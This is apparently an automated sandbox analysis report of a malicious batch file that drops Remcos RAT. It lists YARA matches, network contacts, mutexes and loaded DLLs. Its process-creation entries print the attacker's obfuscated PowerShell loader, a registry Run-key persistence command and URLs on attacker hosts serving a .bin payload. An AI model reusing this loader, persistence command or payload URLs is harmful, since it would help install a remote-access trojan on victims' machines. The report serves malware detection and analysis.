                Source: powershell.exe, 00000002.00000002.1801491105.000002729067C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Misogynists.pfmP
                Source: msiexec.exe, 00000009.00000002.4145675736.00000000088EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/P
                Source: msiexec.exe, 00000009.00000002.4155369663.0000000023E20000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/sNFAyMOQkRdGglJM44.bin
                Source: msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/sNFAyMOQkRdGglJM44.bin&
                Source: msiexec.exe, 00000009.00000002.4155369663.0000000023E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/sNFAyMOQkRdGglJM44.binfaltsTrogaranticonstruct.ro/sNFAyMOQkRdGglJM44.bin
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.4:49737 version: TLS 1.2

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4348, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_2132.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8ABEA22_2_00007FFD9B8ABEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AB0F62_2_00007FFD9B8AB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B97A42A2_2_00007FFD9B97A42A
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5663
                Source: unknownProcess created: Commandline size = 5687
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5663Jump to behavior
                Source: amsi32_2132.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.evad.winBAT@14/10@5/2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Overtidsbetalings.DelJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vshfqw3p.ien.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7128
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2132
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWr
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,r
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
